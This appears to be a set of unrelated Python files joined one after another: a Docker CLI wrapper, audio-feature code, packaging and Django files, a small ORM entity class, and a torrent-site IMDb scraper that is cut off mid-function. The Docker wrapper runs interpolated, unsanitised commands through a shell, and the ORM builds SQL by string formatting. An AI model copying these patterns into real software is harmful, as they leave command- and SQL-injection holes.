    removal_output = self.command('docker rm -f %s' % container_alias)
    return removal_output.split('\n')[0]
def rmi(self, image_id):
    '''
    a method to remove an image

    :param image_id: string with id of image
    :return: list of strings with image layers removed
    '''
    title = '%s.rmi' % self.__class__.__name__
    # validate inputs
    input_fields = {
        'image_id': image_id
    }
    for key, value in input_fields.items():
        object_title = '%s(%s=%s)' % (title, key, str(value))
        self.fields.validate(value, '.%s' % key, object_title)
    # send remove command (docker prints one line per layer untagged/deleted)
    sys_cmd = 'docker rmi %s' % image_id
    output_lines = self.command(sys_cmd).split('\n')
    return output_lines
def ip(self):
    '''
    a method to retrieve the ip of system running docker

    :return: string with ip address of system
    '''
    # on Win 7/8 docker runs inside a virtualbox VM with its own address
    if self.localhost.os.sysname == 'Windows' and float(self.localhost.os.release) < 10:
        sys_cmd = 'docker-machine ip %s' % self.vbox
        system_ip = self.command(sys_cmd).replace('\n','')
    else:
        system_ip = self.localhost.ip
    return system_ip
def search(self, image_name):
    '''
    a method to search docker hub for images matching a name

    :param image_name: string with (partial) name of image to search for
    :return: list of dictionaries with remote image fields
    '''
    # run docker search
    sys_command = 'docker search %s' % image_name
    shell_output = self._handle_command(sys_command)
    # parse table
    from labpack.parsing.shell import convert_table
    image_list = convert_table(shell_output)
    return image_list
def build(self, image_name, image_tag='', dockerfile_path='./Dockerfile'):
    '''
    a method to build a docker image from a Dockerfile

    :param image_name: string with name to give the built image
    :param image_tag: [optional] string with tag to give the built image
    :param dockerfile_path: [optional] string with path to the Dockerfile
    :return: string output from the docker build command
    '''
    # construct sys command arguments (build context is the Dockerfile's folder)
    from os import path
    tag_insert = ''
    if image_tag:
        tag_insert = ':%s' % image_tag
    path_root, path_node = path.split(dockerfile_path)
    sys_command = 'docker build -t %s%s -f %s %s' % (image_name, tag_insert, path_node, path_root)
    # determine verbosity (-q suppresses build output when not verbose)
    print_pipe = False
    if self.verbose:
        print_pipe = True
    else:
        sys_command += ' -q'
    # run command
    shell_output = self._handle_command(sys_command, print_pipe=print_pipe)
    return shell_output
def save(self, image_name, file_name, image_tag=''):
    '''
    a method to export an image (with all its layers) to a tar archive

    :param image_name: string with name or id of image
    :param file_name: string with path of the output tar file
    :param image_tag: [optional] string with tag associated with image
    :return: string output from the docker save command
    '''
    sys_command = 'docker save -o %s %s' % (file_name, image_name)
    if image_tag:
        sys_command += ':%s' % image_tag
    return self.command(sys_command)
def command(self, sys_command):
    '''
    a method to run a system command in a separate shell

    :param sys_command: string with docker command
    :return: string output from docker
    :raises Exception: with the command's own output when it exits non-zero
    '''
    title = '%s.command' % self.__class__.__name__
    # validate inputs
    input_fields = {
        'sys_command': sys_command
    }
    for key, value in input_fields.items():
        object_title = '%s(%s=%s)' % (title, key, str(value))
        self.fields.validate(value, '.%s' % key, object_title)
    # run the command in a shell, capturing stderr alongside stdout
    from subprocess import check_output, STDOUT, CalledProcessError
    try:
        output = check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
    except CalledProcessError as err:
        # surface docker's error text (ascii-only) instead of a bare exit code
        raise Exception(err.output.decode('ascii', 'ignore'))
    return output
def synopsis(self, container_alias):
    '''
    a method to summarize key configuration settings required for docker compose

    :param container_alias: string with name or id of container
    :return: dictionary with values required for module configurations
    '''
    title = '%s.synopsis' % self.__class__.__name__
    # validate inputs
    object_title = '%s(container_alias=%s)' % (title, str(container_alias))
    self.fields.validate(container_alias, '.container_alias', object_title)
    # retrieve the container settings and boil them down to the summary fields
    container_settings = self.inspect_container(container_alias)
    return self._synopsis(container_settings)
def enter(self, container_alias):
    '''
    a method to open up a terminal inside a running container

    :param container_alias: string with name or id of container
    :return: None
    '''
    title = '%s.enter' % self.__class__.__name__
    # validate inputs
    input_fields = {
        'container_alias': container_alias
    }
    for key, value in input_fields.items():
        object_title = '%s(%s=%s)' % (title, key, str(value))
        self.fields.validate(value, '.%s' % key, object_title)
    # compose system command
    from os import system
    sys_cmd = 'docker exec -it %s sh' % container_alias
    # BUGFIX: the original `sysname in ('Windows')` tested substring membership
    # in the string 'Windows' (the parentheses do not make a tuple), so any
    # substring such as 'Win' would also have matched; compare for equality
    if self.localhost.os.sysname == 'Windows':
        # winpty provides the interactive tty docker needs on windows shells
        sys_cmd = 'winpty %s' % sys_cmd
    # open up terminal
    system(sys_cmd)
def run(self, image_name, container_alias, image_tag='', environmental_variables=None, mapped_ports=None, mounted_volumes=None, start_command='', network_name='', run_flags=''):
    '''
    a method to start a local container

    :param image_name: string with name or id of image
    :param container_alias: string with name to assign to container
    :param image_tag: [optional] string with tag assigned to image
    :param environmental_variables: [optional] dictionary of envvar fields to add to container
    :param mapped_ports: [optional] dictionary of port fields to map to container
    :param mounted_volumes: [optional] dictionary of path fields to map to container
    :param start_command: [optional] string of command (and any arguments) to run inside container
    :param network_name: [optional] string with name of docker network to link container to
    :param run_flags: [optional] string with additional docker options to add to container
    :return: string with container id

    NOTE:   valid characters for environmental variables key names follow the shell
            standard of upper and lower alphanumerics or underscore and cannot start
            with a numerical value.

    NOTE:   ports are mapped such that the key name is the system port and the
            value is the port inside the container. both must be strings of digits.

    NOTE:   volumes are mapped such that the key name is the absolute or relative
            system path and the value is the absolute path inside the container.
            both must be strings.

    NOTE:   additional docker options:
            --entrypoint    overrides existing entrypoint command
            --rm            removes container once start command exits
            --log-driver    sets system logging settings for the container
            https://docs.docker.com/engine/reference/run
    '''
    title = '%s.run' % self.__class__.__name__
    # validate inputs
    input_fields = {
        'image_name': image_name,
        'container_alias': container_alias,
        'image_tag': image_tag,
        'environmental_variables': environmental_variables,
        'mapped_ports': mapped_ports,
        'mounted_volumes': mounted_volumes,
        'start_command': start_command,
        'network_name': network_name,
        'run_flags': run_flags
    }
    for key, value in input_fields.items():
        if value:
            object_title = '%s(%s=%s)' % (title, key, str(value))
            self.fields.validate(value, '.%s' % key, object_title)
    # validate subfields (each dict key and value against its schema component)
    if environmental_variables:
        for key, value in environmental_variables.items():
            key_title = '%s(environmental_variables={%s:...})' % (title, key)
            self.fields.validate(key, '.envvar_key', key_title)
            value_title = '%s(environmental_variables={%s:%s})' % (title, key, str(value))
            self.fields.validate(value, '.envvar_value', value_title)
    else:
        environmental_variables = {}
    if mapped_ports:
        for key, value in mapped_ports.items():
            key_title = '%s(mapped_ports={%s:...})' % (title, key)
            self.fields.validate(key, '.port_key', key_title)
            value_title = '%s(mapped_ports={%s:%s})' % (title, key, str(value))
            self.fields.validate(value, '.port_value', value_title)
    else:
        mapped_ports = {}
    if mounted_volumes:
        for key, value in mounted_volumes.items():
            key_title = '%s(mounted_volumes={%s:...})' % (title, key)
            self.fields.validate(key, '.mount_field', key_title)
            value_title = '%s(mounted_volumes={%s:%s})' % (title, key, str(value))
            self.fields.validate(value, '.mount_field', value_title)
    else:
        mounted_volumes = {}
    # TODO verify image exists (locally or remotely) ???
    # verify alias does not exist
    for container in self.ps():
        if container['NAMES'] == container_alias:
            raise ValueError('%s(container_alias="%s") already exists. Try first: docker rm -f %s' % (title, container_alias, container_alias))
    # verify network exists
    network_exists = False
    for network in self.network_ls():
        if network['NAME'] == network_name:
            network_exists = True
    if network_name and not network_exists:
        raise ValueError('%s(network_name="%s") does not exist. Try first: docker network create %s' % (title, network_name, network_name))
    # verify system paths and compose absolute path mount map
    absolute_mounts = {}
    from os import path
    for key, value in mounted_volumes.items():
        if not path.exists(key):
            raise ValueError('%s(mounted_volume={%s:...}) is not a valid path on localhost.' % (title, key))
        absolute_path = path.abspath(key)
        # docker on windows expects a leading slash before the drive letter
        if self.localhost.os.sysname == 'Windows':
            absolute_path = '"/%s"' % absolute_path
        else:
            absolute_path = '"%s"' % absolute_path
        absolute_mounts[absolute_path] = '"%s"' % value
    # compose run command
    sys_cmd = 'docker run --name %s' % container_alias
    for key, value in environmental_variables.items():
        sys_cmd += ' -e %s=%s' % (key.upper(), value)
    for key, value in mapped_ports.items():
        sys_cmd += ' -p %s:%s' % (key, value)
    for key, value in absolute_mounts.items():
        sys_cmd += ' -v %s:%s' % (key, value)
    if network_name:
        sys_cmd += ' --network %s' % network_name
    if run_flags:
        sys_cmd += ' %s' % run_flags.strip()
    # -d detaches so the command returns the container id immediately
    sys_cmd += ' -d %s' % image_name
    if image_tag:
        sys_cmd += ':%s' % image_tag
    if start_command:
        sys_cmd += ' %s' % start_command.strip()
    # run run command and return the container id (first output line)
    output_lines = self.command(sys_cmd).split('\n')
    return output_lines[0]
if __name__ == '__main__':
    # manual smoke tests for the docker client (requires a local docker daemon)
    # test docker client init
    from pprint import pprint
    docker_client = dockerClient()
    # test docker list methods
    images = docker_client.images()
    print(images)
    containers = docker_client.ps()
    print(containers)
    networks = docker_client.network_ls()
    print(networks)
    remote_images = docker_client.search('alpine')
    print(remote_images)
    # # test docker run
    # from labpack.records.settings import load_settings
    # docker_config = load_settings('../../data/test_docker.yaml')
    # container_id = docker_client.run(
    #     image_name=docker_config['image_name'],
    #     container_alias=docker_config['container_alias'],
    #     environmental_variables=docker_config['envvar'],
    #     mounted_volumes=docker_config['mounts'],
    #     mapped_ports=docker_config['ports'],
    #     start_command=docker_config['command']
    # )
    # print(container_id)
    #
    # # wait for container to start
    # from time import sleep
    # sleep(1)
    # test docker synopsis
    for container in containers:
        settings = docker_client.synopsis(container['CONTAINER ID'])
        pprint(settings)
    # test enter and rm from separate script
    print('************\nRUN python test_platforms_docker_enter.py to test enter and rm functionality' )
| 29,112 | 8,414 |
import numpy as np
import pandas as pd
def load_data(dataset='training', path='../data_processed/'):
    """Load a pickled dataset split (e.g. 'training') from the processed-data folder."""
    pickle_path = path + dataset + '_set.pkl'
    return pd.read_pickle(pickle_path)
def process_files_to_mfccs(dataset='training', path='../data_processed/', target_column='mfccs'):
    """Explode per-file MFCC matrices into a frame-level feature table.

    Each row of the loaded dataset holds a 2-D array (coefficients x frames)
    in ``target_column`` plus a ``Label``. Returns a DataFrame indexed by
    ``File_id`` with one row per frame and one column per coefficient.
    """
    df = load_data(dataset=dataset, path=path)
    labels, files, column_values = [], [], []
    for index, row in df.iterrows():
        # BUGFIX: honour target_column -- it was accepted but the code read
        # row['mfccs'] directly, so passing another column name had no effect
        matrix = row[target_column]
        # one output row per frame (i.e. per column of the 2-D array)
        for frame in range(matrix.shape[1]):
            labels.append(row['Label'])
            files.append(index)
            column_values.append(matrix[:, frame])
    frames_df = pd.DataFrame({'File_id': files, 'Label': labels, 'column_values': column_values})
    # expand each frame's coefficient vector into independent columns,
    # keeping the file id and label alongside
    features_df = pd.concat([frames_df['column_values'].apply(pd.Series), frames_df['File_id'], frames_df['Label']], axis=1)
    features_df = features_df.set_index('File_id')
    return features_df
| 947 | 305 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'mnowotka'
import sys
# fall back to bootstrapping setuptools when it is not already installed
try:
    from setuptools import setup
except ImportError:
    from ez_setup import use_setuptools
    use_setuptools()
    from setuptools import setup
# NOTE(review): hard pin to CPython 2.7.3-2.7.6; installation aborts on any
# other interpreter, including all of Python 3
if sys.version_info < (2, 7, 3) or sys.version_info >= (2, 7, 7):
    raise Exception('ChEMBL software stack requires python 2.7.3 - 2.7.7')
setup(
    name='chembl-assay-network',
    version='0.8.1',
    author='Michal Nowotka',
    author_email='mnowotka@ebi.ac.uk',
    description='Python package generating compound co-occurance matrix for all assays from given document',
    url='https://www.ebi.ac.uk/chembldb/index.php/ws',
    license='CC BY-SA 3.0',
    packages=['chembl_assay_network'],
    long_description=open('README.rst').read(),
    install_requires=[
        'chembl-core-model>=0.8.3',
        'numpy>=1.7.1',
        'scipy',
    ],
    include_package_data=True,
    # NOTE(review): the classifier declares Apache License while license= above
    # says CC BY-SA 3.0 -- confirm which one is intended
    classifiers=['Development Status :: 2 - Pre-Alpha',
                 'Environment :: Web Environment',
                 'Framework :: Django',
                 'Intended Audience :: Developers',
                 'License :: OSI Approved :: Apache Software License',
                 'Operating System :: POSIX :: Linux',
                 'Programming Language :: Python :: 2.7',
                 'Topic :: Scientific/Engineering :: Chemistry'],
    zip_safe=False,
)
#!/usr/bin/env python3
# ISC License
#
# Copyright (c) 2019, Andrea Giammarchi, @WebReflection
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
import random
import os
import sys
# make the bundled filebus python client importable
sys.path.insert(1, os.path.realpath('./node_modules/filebus/python'))
# initialize the display
from waveshare_epd import epd2in13
epaper = epd2in13.EPD()
# they defined width and height upside down ^_^;;
width=epaper.height
height=epaper.width
# initialize the "canvas"
from PIL import Image, ImageFont, ImageDraw
# initialize the font
from font_fredoka_one import FredokaOne
font = ImageFont.truetype(FredokaOne, 42)
# initiate the FileBus channel
from filebus import FileBus
def ready(value = None):
    # Full-refresh the panel once to clear ghosting, switch to partial updates,
    # then notify the JS side (random nonce as payload) that the display is ready.
    # NOTE: relies on the module-level `epaper` and `fb` objects.
    print('ready')
    epaper.init(epaper.lut_full_update)
    epaper.Clear(0xFF)
    epaper.init(epaper.lut_partial_update)
    fb.send('ready', random.random())
def update(message = ''):
    # Draw `message` centered on the panel (rotated 180 degrees) and send an
    # acknowledgement (random nonce) back over the filebus channel.
    print('update: ' + message);
    # NOTE(review): ImageFont.getsize was removed in Pillow 10 -- if Pillow is
    # ever upgraded this needs font.getbbox()/getlength() instead; confirm the
    # pinned Pillow version.
    w, h = font.getsize(message)
    x = (width - w) / 2
    y = (height - h) / 2
    # mode "P" (palettized), 255 = white background, 0 = black text
    img = Image.new("P", (width, height), 255)
    draw = ImageDraw.Draw(img)
    draw.text((x, y), message, font = font, fill = 0)
    epaper.display(epaper.getbuffer(img.rotate(180)))
    fb.send('update', random.random())
# use .js as channel input, and .python as channel output
fb = FileBus('.js', '.python')
# register the handlers invoked when the JS side emits these events
fb.on('ready', ready)
fb.on('update', update)
# just wait for JS handshake
| 2,029 | 748 |
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import os
import unittest
from graph_notebook.configuration.generate_config import AuthModeEnum, Configuration
from graph_notebook.configuration.get_config import get_config
class TestGenerateConfigurationMain(unittest.TestCase):
    # End-to-end tests that invoke graph_notebook.configuration.generate_config
    # as a module (the same way the Sagemaker install script does) and verify
    # the configuration file it writes.
    @classmethod
    def setUpClass(cls) -> None:
        cls.generic_host = 'blah'
        cls.neptune_host = 'instance.cluster.us-west-2.neptune.amazonaws.com'
        cls.port = 8182
        # scratch file written by each CLI invocation; removed in tearDown
        cls.test_file_path = f'{os.path.abspath(os.path.curdir)}/test_generate_from_main.json'
        cls.python_cmd = os.environ.get('PYTHON_CMD', 'python3')  # environment variable to let ToD hosts specify
        # where the python command is that is being used for testing.
def tearDown(self) -> None:
    """Remove the generated config file, if the test produced one."""
    try:
        os.remove(self.test_file_path)
    except FileNotFoundError:
        pass
def test_generate_configuration_main_defaults_neptune(self):
    # neptune host type: explicit values matching the CLI defaults must round-trip
    expected_config = Configuration(self.neptune_host, self.port, auth_mode=AuthModeEnum.DEFAULT,
                                    load_from_s3_arn='', ssl=True)
    self.generate_config_from_main_and_test(expected_config, host_type='neptune')
def test_generate_configuration_main_defaults_generic(self):
    # generic host type: only host/port/ssl apply (no auth mode or loader arn)
    expected_config = Configuration(self.generic_host, self.port, ssl=True)
    self.generate_config_from_main_and_test(expected_config)
def test_generate_configuration_main_override_defaults_neptune(self):
    # non-default IAM auth, a loader arn and ssl disabled must all round-trip
    expected_config = Configuration(self.neptune_host, self.port, auth_mode=AuthModeEnum.IAM,
                                    load_from_s3_arn='loader_arn', ssl=False)
    self.generate_config_from_main_and_test(expected_config, host_type='neptune')
def test_generate_configuration_main_override_defaults_generic(self):
    # ssl disabled must round-trip through the CLI for a generic host
    expected_config = Configuration(self.generic_host, self.port, ssl=False)
    self.generate_config_from_main_and_test(expected_config)
def test_generate_configuration_main_empty_args_neptune(self):
    # empty-string optional args must fall back to the Configuration defaults
    expected_config = Configuration(self.neptune_host, self.port)
    result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config '
                       f'--host "{expected_config.host}" --port "{expected_config.port}" --auth_mode "" --ssl "" '
                       f'--load_from_s3_arn "" --config_destination="{self.test_file_path}" ')
    # a zero exit status means the CLI accepted the empty arguments
    self.assertEqual(0, result)
    config = get_config(self.test_file_path)
    self.assertEqual(expected_config.to_dict(), config.to_dict())
def test_generate_configuration_main_empty_args_generic(self):
expected_config = Configuration(self.generic_host, self.port)
result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config '
f'--host "{expected_config.host}" --port "{expected_config.port}" --ssl "" '
f'--config_destination="{self.test_file_path}" ')
self.assertEqual(0, result)
config = get_config(self.test_file_path)
self.assertEqual(expected_config.to_dict(), config.to_dict())
def generate_config_from_main_and_test(self, source_config: Configuration, host_type=None):
# This will run the main method that our install script runs on a Sagemaker notebook.
# The return code should be 0, but more importantly, we need to assert that the
# Configuration object we get from the resulting file is what we expect.
if host_type == 'neptune':
result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config '
f'--host "{source_config.host}" --port "{source_config.port}" '
f'--auth_mode "{source_config.auth_mode.value}" --ssl "{source_config.ssl}" '
f'--load_from_s3_arn "{source_config.load_from_s3_arn}" '
f'--config_destination="{self.test_file_path}" ')
else:
result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config '
f'--host "{source_config.host}" --port "{source_config.port}" '
f'--ssl "{source_config.ssl}" --config_destination="{self.test_file_path}" ')
self.assertEqual(result, 0)
config = get_config(self.test_file_path)
self.assertEqual(source_config.to_dict(), config.to_dict())
| 4,553 | 1,343 |
# Software License Agreement (Apache 2.0 License)
#
# Copyright (c) 2021, The Ohio State University
# Center for Design and Manufacturing Excellence (CDME)
# The Artificially Intelligent Manufacturing Systems Lab (AIMS)
# All rights reserved.
#
# Author: Adam Exley
import numpy as np
import logging as log
MAX_LINKS = 7  # Upper bound on robot links handled by this package
PATH_JSON_PATH = r'data/paths.json'  # Local path-definition file
JSON_LINK_FILE = r"\\marvin\ROPE\joint_states.json"  # Network share holding recorded joint states
##################################### Crops
CROP_RENDER_WEIGHTING = [6,3,3,0,1,0] # Higher numbers indicate more weight on that joint for rendering
CROP_VARYING = 'SLUB' # Joints to vary for crop calculation
CROP_MAX_PER_JOINT = 50 # Max poses for a single joint
CROP_SEC_ALLOTTED_APPROX = 20 # Approx number of seconds allowed for each crop rendering stage calculation
CROP_PADDING = 10  # Padding added around computed crops (presumably pixels — confirm at call sites)
##################################### Lookups
GPU_MEMORY_ALLOWED_FOR_LOOKUP = 0.1 # Depending on hardware, this may vary. ~10% seems to work, but anything ~25%+ will overallocate for calculations
LOOKUP_NAME_LENGTH = 5  # Length of generated lookup-table identifiers
LOOKUP_MAX_DIV_PER_LINK = 200  # Upper bound on pose divisions per link in a lookup table
LOOKUP_JOINTS = 'SLU' # SL is also usable
LOOKUP_NUM_RENDERED = 6 # 3 or 4 for SL
##################################### Segmentation Models
MODELDATA_FILE_NAME = 'ModelData.json'  # Metadata file describing stored segmentation models
NUM_MODELS_TO_KEEP = 3 # If a model has more than this number of stored checkpoints, they will be deleted.
MODEL_NAME_LENGTH = 4  # Length of generated model identifiers
##################################### Wizard Settings
WIZARD_DATASET_PREVIEW = True # Set to false to reduce lag caused by dataset previewing
##################################### Verifier
VERIFIER_ALPHA = .7 # Weight to place on images in verifier
VERIFIER_SELECTED_GAMMA = -50 # Amount to add to R/G/B Channels of a selected image. Usually negative.
VERIFIER_SCALER = 1.5 # Scale factor of thumbnails. Overall scale is this divided by THUMBNAIL_DS_FACTOR
VERIFIER_ROWS = 4 # Rows of images present in Verifier
VERIFIER_COLUMNS = 4 # Columns of images present in Verifier
##################################### Datasets
VIDEO_FPS = 15 # Default video frames per second
THUMBNAIL_DS_FACTOR = 6 # Factor to downscale images by for thumbnails. Larger numbers yield smaller images
DEFAULT_CAMERA_POSE = [0, -1.5, .75, 0, 0, 0] # Base camera pose to fill new datasets with before alignment
def default_render_color_maker(num: int):
    """Creates unique colors for rendering.

    Colors are emitted as [B, G, R] triplets: blue ramps linearly from 0 to
    255 across the palette, green is always 0, and red forms a "V" shape
    (255 -> ~0 -> 255), so every entry is distinct.

    Parameters
    ----------
    num : int
        Number of colors to generate. Should be larger than the number of
        meshes expected to use. For 6-axis robots, the minimum recommended
        number is 7.

    Returns
    -------
    List[List]
        num [B, G, R] triplets.
    """
    if num < 7:
        # logging.warn is deprecated; logging.warning is the supported API.
        log.warning('Fewer than 7 rendering colors are being generated. '
                    'This may cause issues if a URDF with a 6+ axis robot is loaded.')
    blue = np.linspace(0, 255, num).astype(int)  # Blue values are always unique
    green = [0] * blue.size
    red = np.abs(255 - 2 * blue)
    return [[blue[idx], green[idx], red[idx]] for idx in range(num)]


DEFAULT_RENDER_COLORS = default_render_color_maker(7) # Increase if expecting to use more meshes/end effector
from Pybernate.Exceptions import LazyInitializationException
class Entity:
    """Base class tracking persistence lifecycle flags for an entity."""

    def __init__(self):
        # A freshly created entity starts with every lifecycle flag cleared.
        self.dirty = False
        self.deleted = False
        self.initialized = False

    def set_dirty(self, state):
        """Mark (or clear) the entity as having unsaved changes."""
        self.dirty = state

    def get_dirty(self):
        """Return whether the entity has unsaved changes."""
        return self.dirty

    def set_deleted(self, state):
        """Mark (or clear) the entity as deleted."""
        self.deleted = state

    def get_deleted(self):
        """Return whether the entity is marked deleted."""
        return self.deleted

    def set_initialized(self, state):
        """Mark (or clear) the entity as fully initialized."""
        self.initialized = state

    def get_initialized(self):
        """Return whether the entity has been fully initialized."""
        return self.initialized

    def rollback(self):
        """Hook for subclasses; the base entity has nothing to roll back."""
        pass
class IdEntity(Entity):
    """Entity persisted to a single table keyed by one id column.

    At construction time, subclass accessors named ``get_<field>`` /
    ``set_<field>`` are replaced with closures that read/write
    ``self.elements`` instead of executing the subclass bodies; see
    ``override_methods``.
    """

    def __init__(self, **kwargs):
        super().__init__()
        self.id = None
        # Table name defaults to the lower-cased subclass name.
        self.table = self.get_subclass_name().lower()
        self.lazies = set()  # field names not yet loaded from the database
        self.transients = set()  # method names excluded from persistence
        self.elements = {}  # column name -> value
        self._mixin(kwargs)
        self.id_column = "id"
        self.column_names = list(kwargs.keys())
        self.one_to_many = {}  # related entity name -> join column
        self.many_to_one = {}  # related entity name -> join column
        self.override_methods()

    def _mixin(self, data):
        # Merge a dict of column values (clearing any matching lazies), or
        # attach another entity under its table name.
        if isinstance(data, dict):
            self.lazies -= data.keys()
            self.elements = {**self.elements, **data}
        elif isinstance(data, IdEntity):
            self.elements[data.table] = data

    def set_table(self, table_name):
        """Override the table this entity maps to."""
        self.table = table_name

    def set_id_column(self, col_name):
        """Override the name of the primary-key column."""
        self.id_column = col_name

    def add_lazy(self, fxn):
        # fxn is an accessor name; [4:] strips the "get_" prefix.
        self.lazies.add(fxn[4:])

    def add_transient(self, fxn):
        # Transients are stored by full method name (no prefix stripping).
        self.transients.add(fxn)

    def addOneToMany(self, other_table, join_column):
        # [4:] strips a 4-char prefix (mirrors the "get_" convention) —
        # TODO confirm the expected format of other_table.
        self.one_to_many[other_table[4:]] = join_column

    def addManyToOne(self, other_table, join_column):
        self.many_to_one[other_table[4:]] = join_column

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def init_lazy(self, data):
        # Populate from a DB row dict: extract the id, keep the rest.
        self.id = data[self.id_column]
        del data[self.id_column]
        self.elements = data
        # NOTE(review): unlike __init__, this leaves a dict keys *view* (not
        # a list) in column_names — confirm callers tolerate both.
        self.column_names = data.keys()

    def get_element_methods(self):
        return sorted(list(self.get_subclass_methods() - self.transients)) # deterministic for testing

    def override_methods(self):
        """Replace subclass getters/setters with element-backed closures."""
        methods = self.get_element_methods()
        for method in methods:
            if method.startswith("get_"):
                method_target = method[4:]
                # Invoke the subclass accessor once before replacing it —
                # presumably so any registration it performs (add_lazy /
                # add_transient) takes effect; confirm against subclasses.
                getattr(self, method)()
                if method_target in self.lazies and method_target in self.elements:
                    self.lazies.remove(method_target)
                if self.id_column == method_target:
                    setattr(self, method, lambda: self.get_id())
                    continue
                if method in self.transients:
                    continue
                # Bind method_target as a default argument to avoid the
                # classic late-binding-closure bug in this loop.
                setattr(self, method, lambda t=method_target: self.get_element(t))
                if method_target not in self.elements:
                    self.set_element(method_target, None)
            elif method.startswith("set_"):
                method_target = method[4:]
                getattr(self, method)(None)
                if method in self.transients:
                    continue
                setattr(self, method, lambda value, x=method_target: self.set_element(x, value))

    def get_element(self, x):
        """Return a column value; raise if the field is still lazy."""
        if x in self.lazies:
            raise LazyInitializationException(x)
        return self.elements[x]

    def set_element(self, x, value):
        """Set a column value and flag the entity as dirty."""
        self.elements[x] = value
        self.set_dirty(True)

    def get_insert_query(self):
        # Parameterized (%s placeholders) — values are supplied separately
        # via get_raw_elements().
        names_component = ", ".join(["`" + a + "`" for a in self.column_names])
        elements_component = ", ".join(["%s "] * len(self.column_names))
        return "INSERT INTO {} ({}) VALUES ({})".format(self.table,
                                                        names_component,
                                                        elements_component)

    def get_update_query(self):
        # NOTE(review): values are interpolated directly into the SQL string
        # — injection-prone and quote-fragile; consider parameterizing like
        # get_insert_query.
        updates = ", ".join(["{} = '{}'".format(key, value) for key, value in self.elements.items()])
        return "UPDATE {} SET {} WHERE id = {}".format(self.table,
                                                       updates,
                                                       self.id)

    def get_initialize_query(self, attribute):
        """SELECT a single (lazy) attribute for this entity's row."""
        return "SELECT {} FROM {} WHERE {} = {}".format(attribute, self.table, self.id_column, self.id)

    def get_delete_query(self):
        return "DELETE FROM {} WHERE {} = {}".format(self.table, self.id_column, self.id)

    def get_select_all_query(self):
        return "SELECT * FROM {} WHERE {} = {}".format(self.table, self.id_column, self.id)

    def get_eager_fields(self):
        # dict_keys minus sets yields a plain set of immediately-loaded,
        # non-relationship field names.
        return self.elements.keys() - self.lazies - self.transients - self.one_to_many.keys() - self.many_to_one.keys()

    def get_many_to_one_relationships(self):
        return self.many_to_one

    def get_one_to_many_relationships(self):
        return self.one_to_many

    def get_select_lazy_query(self):
        """SELECT only eager fields (plus the id) for this entity's row."""
        fields = self.get_eager_fields()
        fields.add(self.id_column)
        eager_fields = ", ".join(fields)
        return "SELECT {} FROM {} WHERE {} = {}".format(eager_fields, self.table, self.id_column, self.id)

    def get_raw_elements(self):
        """Values in column_names order, for use with get_insert_query."""
        return [self.elements[k] for k in self.column_names]

    def get_subclass_name(self):
        return self.__class__.__name__

    def get_subclass_methods(self):
        # Callables declared on the subclass but not on IdEntity itself.
        return {func for func in dir(self.__class__) if callable(getattr(self.__class__, func))} \
               - {func for func in dir(IdEntity) if callable(getattr(IdEntity, func))}
from .group import Group
from .aminoacid import AminoAcid
from .nucleotide import Nucleotide
from .water import Water
from .ion import Ion
from .cosolute import Cosolute
from .small_molecule import SmallMolecule
| 213 | 73 |
# The number of points to use in smooth curve fits.
n_pts_smooth = 2000
# Default number of harmonics retained in Fourier-series fits (per the
# name; confirm semantics at call sites).
default_fourier_n_harm = 10
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-19 12:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration: alters reads.Book.link to a
    # CharField with max_length=2000.

    dependencies = [
        ('reads', '0007_auto_20171115_2224'),
    ]

    operations = [
        migrations.AlterField(
            model_name='book',
            name='link',
            field=models.CharField(max_length=2000),
        ),
    ]
| 447 | 169 |
from django.db import models
from django.db.models.fields import related
class MarketingCampaign(models.Model):
    """Store the information of marketing campaign."""
    title = models.CharField(max_length=50)
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)  # refreshed on every save

    def __str__(self) -> str:
        return f'<Marketing Campaign: {self.title}>'
class Voucher(models.Model):
    """Store the information of the voucher."""
    # NOTE(review): related_name="campaign" means a MarketingCampaign's
    # vouchers are reached via campaign.campaign — "vouchers" would read
    # better, but renaming changes the query API; confirm before touching.
    campaign = models.ForeignKey(MarketingCampaign, on_delete=models.CASCADE, related_name="campaign")
    code = models.CharField(max_length=15)
    active = models.BooleanField(default=False)
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)  # refreshed on every save

    def __str__(self) -> str:
        active = "Yes" if self.active else "No"
        return f"<Voucher: {self.code} ({active})>"
__author__ = 'armanini'
import httplib, requests, re
from urlparse import urlparse
class KickAssFetcher(object):
def __init__(self):
self.search_url = "http://kickass.to/usearch/"
self.title_re = re.compile(r'(?P<imdb_id>tt\d{7})', flags=re.IGNORECASE + re.MULTILINE)
def search(self, torrent_hash):
url = self.search_url + torrent_hash
print "Start search for: ", url
r = requests.get(url)
if len(r.history) < 0 or r.history[-1].status_code != 302:
print "No History ", r.history
return None
res = self.title_re.findall(r.text)
print res
if res:
print "Found: ", res[-1]
return res[-1]
else:
print "Imdb Not found!"
return None
def get_status_code(self, url):
url_part = urlparse(url)
try:
conn = httplib.HTTPConnection(url_part.netloc)
conn.request("HEAD", url_part.path)
return conn.getresponse().status
except:
